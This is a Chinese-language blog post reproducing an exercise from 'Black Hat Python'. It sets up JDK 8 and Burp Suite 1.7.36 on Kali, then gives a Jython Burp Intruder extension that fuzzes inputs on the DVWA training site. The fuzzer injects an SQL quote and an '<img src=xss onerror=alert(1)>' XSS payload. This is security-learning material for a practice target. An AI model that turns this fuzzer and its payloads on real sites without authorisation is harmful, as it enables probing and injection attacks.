近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第15个实验(burpsuite载核生成器插件),我的测试环境是mbp电脑+kali虚拟机+dvwa在线靶场。当前只支持python2.7的环境,稍微调整一下软链接,然后我把kali 上的jdk和burpsuite都卸载了,最后用的是jdk 1.8和burpsuite 1.7.36,成功复现了这个实验,顺便说一下,做了好多次实验之后,唯手熟尔~
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
步骤一:环境准备
kali 安装jdk1.8
apt-get update
apt-get install software-properties-common
apt-add-repository 'deb http://security.debian.org/debian-security stretch/updates main'
apt-get update
apt-get install openjdk-8-jdk
选择jdk1.8
update-alternatives --config java
更新python2的软连接
ln -s /usr/bin/python2 /usr/bin/python
安装较低版本的burpsuite 1.7.36
wget https://portswigger.net/burp/releases/download?product=community&version=1.7.36&type=linux
sudo chmod +x burpsuite_community_linux_v1_7_36.sh
sudo ./burpsuite_community_linux_v1_7_36.sh
导入成功,这里需要注意路径中不要有中文
步骤二:实验网站准备
选择dvwa在线靶场[1]
步骤三:实战演练
1、进入xss注入模块,提交一个字符串
2、然后在burp的proxy模块,将载核发送到intruder模块
3、在intruder模块中payload页面下,选择payload type为Extension-generated,然后在payload options里面选择BHP Payload Generator 就大功告成了~
4、点击start attack,这里实际上测试出了弹窗,但是显示的并不友好
参考代码:
# -*- coding: utf-8 -*-
# @Time : 2022/6/14 7:15 PM
# @Author : ailx10
# @File : bhf_fuzzer.py
from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator
from java.util import List,ArrayList
import random
class BurpExtender(IBurpExtender,IIntruderPayloadGeneratorFactory):
def registerExtenderCallbacks(self,callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.registerIntruderPayloadGeneratorFactory(self)
return
def getGeneratorName(self):
return "BHP Payload Generator"
def createNewInstance(self,attack):
return BHPFuzzer(self,attack)
class BHPFuzzer(IIntruderPayloadGenerator):
def __init__(self,extender,attack):
self._extender = extender
self._helpers = extender._helpers
self._attack = attack
self.max_payloads = 10
self.num_iterations = 0
return
def hasMorePayloads(self):
if self.num_iterations == self.max_payloads:
return False
else:
return True
def getNextPayload(self,current_payload):
payload = "".join(chr(x) for x in current_payload)
payload = self.mutate_payload(payload)
self.num_iterations += 1
return payload
def reset(self):
self.num_iterations = 0
return
def mutate_payload(self,original_payload):
picker = random.randint(1,3)
offset = random.randint(0,len(original_payload)-1)
front,back = original_payload[:offset],original_payload[offset:]
# SQL
if picker == 1:
front += "'"
# XSS
elif picker == 2:
front += "<img src=xss onerror=alert(1)>"
# Randomly extract a piece of data from the original carrier core, repeat it any number of times,
# and append it to the end of the front block
elif picker == 3:
chunk_length = random.randint(0,len(back)-1)
repeater = random.randint(1,10)
for _ in range(repeater):
front += original_payload[:offset + chunk_length]
return front + back
参考
- ^dvwa在线靶场 https://www.vulnspy.com/dvwa/
发布于 2022-06-14 21:15